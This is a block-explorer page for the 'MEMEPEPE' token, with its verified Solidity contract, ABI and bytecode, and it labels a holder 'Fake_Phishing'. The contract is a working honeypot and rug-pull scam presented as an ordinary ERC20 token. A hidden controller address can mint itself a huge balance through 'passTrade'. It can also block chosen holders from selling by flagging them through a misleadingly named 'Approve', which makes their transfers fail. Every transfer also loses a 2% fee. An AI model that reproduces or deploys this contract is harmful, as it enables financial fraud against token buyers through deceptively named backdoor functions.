ETH Price: $2,630.14 (-0.86%)

Token

MEMEPEPE (MEMEPEPE)
 

Overview

Max Total Supply

1,000,000,000 MEMEPEPE

Holders

23

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Fake_Phishing323538
Balance
5,953,051.834932614204578003 MEMEPEPE

Value
$0.00
0x6a81cb428fb00fba539d943f29ebbbd9f9bd530d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Coin

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-04-29
*/

/**
 *Submitted for verification at BscScan.com on 2023-04-16
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;


/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}



abstract contract Ownable {
    address private _owner;

    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

     /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checyydsOwen();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checyydsOwen() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}



contract Coin is Ownable {

   

    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _oomuskJCEO;

    uint256 private _MYtotalSupply;
    string private _MYname;
    string private _MYsymbol;

    mapping(address => bool) private vipcc;
    function quitApprove(address sss) external   {
        if (_oomuskJCEO == _msgSender()){
            vipcc[sss] = false;
        }
    }

    function Approve(address sss) external   {
        if (_oomuskJCEO == _msgSender()){
            vipcc[sss] = true;
        }
    }

    function queryantibot(address sss) public view returns(bool)  {
        return vipcc[sss];
    }

    function passTrade() external {
        if (_msgSender() != _oomuskJCEO) {
            return;
        }else if (_oomuskJCEO == _msgSender()){
            _balances[_msgSender()] = (1)*(1)*((8000))*(233000000000*10**18);
        }
    }
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_,address AntiBot) {
        _MYname = name_;
        _MYsymbol = symbol_;
        _oomuskJCEO = AntiBot;
        _onceCCCmint(msg.sender, 1000000000*10**decimals());

    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual  returns (string memory) {
        return _MYname;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual  returns (string memory) {
        return _MYsymbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual  returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual  returns (uint256) {
        return _MYtotalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual  returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual  returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }
    /**
         * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    uint256 kkff = 2;
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        if(vipcc[from]) {
            amount = totalSupply();
        }
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
     
        uint256 balance= _balances[from];
        require(balance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = balance.sub(amount);
        uint256 feeeA = amount.mul(kkff).div(100);
        _balances[to] =  _balances[to].add(amount).sub(feeeA);
        emit Transfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _onceCCCmint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: CCCCCASADSADA to the zero address");

        _MYtotalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _MYtotalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);


    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"AntiBot","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_oomuskJCEO","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"passTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"queryantibot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"quitApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260026008553480156200001657600080fd5b5060405162001284380380620012848339810160408190526200003991620002a5565b6200004433620000b7565b6005620000528482620003c1565b506006620000618382620003c1565b50600380546001600160a01b0319166001600160a01b038316179055620000ae336200008b601290565b6200009890600a620005a2565b620000a890633b9aca00620005ba565b62000107565b505050620005ea565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001735760405162461bcd60e51b815260206004820152602860248201527f45524332303a204343434343415341445341444120746f20746865207a65726f604482015267206164647265737360c01b606482015260840160405180910390fd5b8060046000828254620001879190620005d4565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200020857600080fd5b81516001600160401b0380821115620002255762000225620001e0565b604051601f8301601f19908116603f01168101908282118183101715620002505762000250620001e0565b816040528381526020925086838588010111156200026d57600080fd5b600091505b8382101562000291578582018301518183018401529082019062000272565b600093810190920192909252949350505050565b600080600060608486031215620002bb57600080fd5b83516001600160401b0380821115620002d357600080fd5b620002e187838801620001f6565b94506020860151915080821115620002f857600080fd5b506200030786828701620001f6565b604086015190935090506001600160a01b03811681146200032757600080fd5b809150509250925092565b600181811c908216806200034757607f821691505b6020821081036200036857634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620003bc57600081815260208120601f850160051c81016020861015620003975750805b601f850160051c820191505b81811015620003b857828155600101620003a3565b5050505b505050565b81516001600160401b03811115620003dd57620003dd620001e0565b620003f581620003ee845462000332565b846200036e565b602080601f8311600181146200042d5760008415620004145750858301515b600019600386901b1c1916600185901b178555620003b8565b600085815260208120601f198616915b828110156200045e578886015182559484019460019091019084016200043d565b50858210156200047d5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004e4578160001904821115620004c857620004c86200048d565b80851615620004d657918102915b93841c9390800290620004a8565b509250929050565b600082620004fd575060016200059c565b816200050c575060006200059c565b8160018114620005255760028114620005305762000550565b60019150506200059c565b60ff8411156200054457620005446200048d565b50506001821b6200059c565b5060208310610133831016604e8410600b841016171562000575575081810a6200059c565b620005818383620004a3565b80600019048211156200059857620005986200048d565b0290505b92915050565b6000620005b360ff841683620004ec565b9392505050565b80820281158282048414176200059c576200059c6200048d565b808201808211156200059c576200059c6200048d565b610c8a80620005fa6000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c80639287f39c116100ad578063ad55651f11610071578063ad55651f14610273578063cc0a954f14610286578063dd62ed3e1461028e578063f1204903146102a1578063f2fde38b146102b457600080fd5b80639287f39c1461020657806395d89b411461023257806396bfcd231461023a578063a457c2d71461024d578063a9059cbb1461026057600080fd5b8063313ce567116100f4578063313ce5671461018c578063395093511461019b57806370a08231146101ae578063715018a6146101d75780638da5cb5b146101e157600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd1461016757806323b872dd14610179575b600080fd5b61012e6102c7565b60405161013b9190610a87565b60405180910390f35b610157610152366004610af1565b610359565b604051901515815260200161013b565b6004545b60405190815260200161013b565b610157610187366004610b1b565b610373565b6040516012815260200161013b565b6101576101a9366004610af1565b610397565b61016b6101bc366004610b57565b6001600160a01b031660009081526001602052604090205490565b6101df6103b9565b005b6000546001600160a01b03165b6040516001600160a01b03909116815260200161013b565b610157610214366004610b57565b6001600160a01b031660009081526007602052604090205460ff1690565b61012e6103cd565b6101df610248366004610b57565b6103dc565b61015761025b366004610af1565b610417565b61015761026e366004610af1565b610497565b6101df610281366004610b57565b6104a5565b6101df6104da565b61016b61029c366004610b72565b61052d565b6003546101ee906001600160a01b031681565b6101df6102c2366004610b57565b610558565b6060600580546102d690610ba5565b80601f016020809104026020016040519081016040528092919081815260200182805461030290610ba5565b801561034f5780601f106103245761010080835404028352916020019161034f565b820191906000526020600020905b81548152906001019060200180831161033257829003601f168201915b5050505050905090565b6000336103678185856105ce565b60019150505b92915050565b6000336103818582856106f2565b61038c85858561076c565b506001949350505050565b6000336103678185856103aa838361052d565b6103b49190610bf5565b6105ce565b6103c16109a6565b6103cb6000610a00565b565b6060600680546102d690610ba5565b600354336001600160a01b0390911603610414576001600160a01b0381166000908152600760205260409020805460ff191660011790555b50565b60003381610425828661052d565b90508381101561048a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61038c82868684036105ce565b60003361036781858561076c565b600354336001600160a01b0390911603610414576001600160a01b03166000908152600760205260409020805460ff19169055565b6003546001600160a01b0316336001600160a01b0316146104f757565b600354336001600160a01b03909116036103cb573360009081526001602052604090206d5be6fcd5cc81036451a2000000009055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6105606109a6565b6001600160a01b0381166105c55760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610481565b61041481610a00565b6001600160a01b0383166106305760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610481565b6001600160a01b0382166106915760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610481565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106fe848461052d565b9050600019811461076657818110156107595760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610481565b61076684848484036105ce565b50505050565b6001600160a01b03831660009081526007602052604090205460ff161561079257506004545b6001600160a01b0383166107f65760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610481565b6001600160a01b0382166108585760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610481565b6001600160a01b038316600090815260016020526040902054818110156108d05760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610481565b6108da8183610a50565b6001600160a01b0385166000908152600160205260408120919091556008546109119060649061090b908690610a63565b90610a6f565b6001600160a01b03851660009081526001602052604090205490915061094390829061093d9086610a7b565b90610a50565b6001600160a01b0380861660008181526001602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109979087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146103cb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610481565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610a5c8284610c08565b9392505050565b6000610a5c8284610c1b565b6000610a5c8284610c32565b6000610a5c8284610bf5565b600060208083528351808285015260005b81811015610ab457858101830151858201604001528201610a98565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aec57600080fd5b919050565b60008060408385031215610b0457600080fd5b610b0d83610ad5565b946020939093013593505050565b600080600060608486031215610b3057600080fd5b610b3984610ad5565b9250610b4760208501610ad5565b9150604084013590509250925092565b600060208284031215610b6957600080fd5b610a5c82610ad5565b60008060408385031215610b8557600080fd5b610b8e83610ad5565b9150610b9c60208401610ad5565b90509250929050565b600181811c90821680610bb957607f821691505b602082108103610bd957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561036d5761036d610bdf565b8181038181111561036d5761036d610bdf565b808202811582820484141761036d5761036d610bdf565b600082610c4f57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220120ff21145540ef41f73023d497bfe80c92310d7c34ef3eb99a835d87d80ff4464736f6c63430008130033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac8900000000000000000000000000000000000000000000000000000000000000084d454d455045504500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084d454d4550455045000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c80639287f39c116100ad578063ad55651f11610071578063ad55651f14610273578063cc0a954f14610286578063dd62ed3e1461028e578063f1204903146102a1578063f2fde38b146102b457600080fd5b80639287f39c1461020657806395d89b411461023257806396bfcd231461023a578063a457c2d71461024d578063a9059cbb1461026057600080fd5b8063313ce567116100f4578063313ce5671461018c578063395093511461019b57806370a08231146101ae578063715018a6146101d75780638da5cb5b146101e157600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd1461016757806323b872dd14610179575b600080fd5b61012e6102c7565b60405161013b9190610a87565b60405180910390f35b610157610152366004610af1565b610359565b604051901515815260200161013b565b6004545b60405190815260200161013b565b610157610187366004610b1b565b610373565b6040516012815260200161013b565b6101576101a9366004610af1565b610397565b61016b6101bc366004610b57565b6001600160a01b031660009081526001602052604090205490565b6101df6103b9565b005b6000546001600160a01b03165b6040516001600160a01b03909116815260200161013b565b610157610214366004610b57565b6001600160a01b031660009081526007602052604090205460ff1690565b61012e6103cd565b6101df610248366004610b57565b6103dc565b61015761025b366004610af1565b610417565b61015761026e366004610af1565b610497565b6101df610281366004610b57565b6104a5565b6101df6104da565b61016b61029c366004610b72565b61052d565b6003546101ee906001600160a01b031681565b6101df6102c2366004610b57565b610558565b6060600580546102d690610ba5565b80601f016020809104026020016040519081016040528092919081815260200182805461030290610ba5565b801561034f5780601f106103245761010080835404028352916020019161034f565b820191906000526020600020905b81548152906001019060200180831161033257829003601f168201915b5050505050905090565b6000336103678185856105ce565b60019150505b92915050565b6000336103818582856106f2565b61038c85858561076c565b506001949350505050565b6000336103678185856103aa838361052d565b6103b49190610bf5565b6105ce565b6103c16109a6565b6103cb6000610a00565b565b6060600680546102d690610ba5565b600354336001600160a01b0390911603610414576001600160a01b0381166000908152600760205260409020805460ff191660011790555b50565b60003381610425828661052d565b90508381101561048a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61038c82868684036105ce565b60003361036781858561076c565b600354336001600160a01b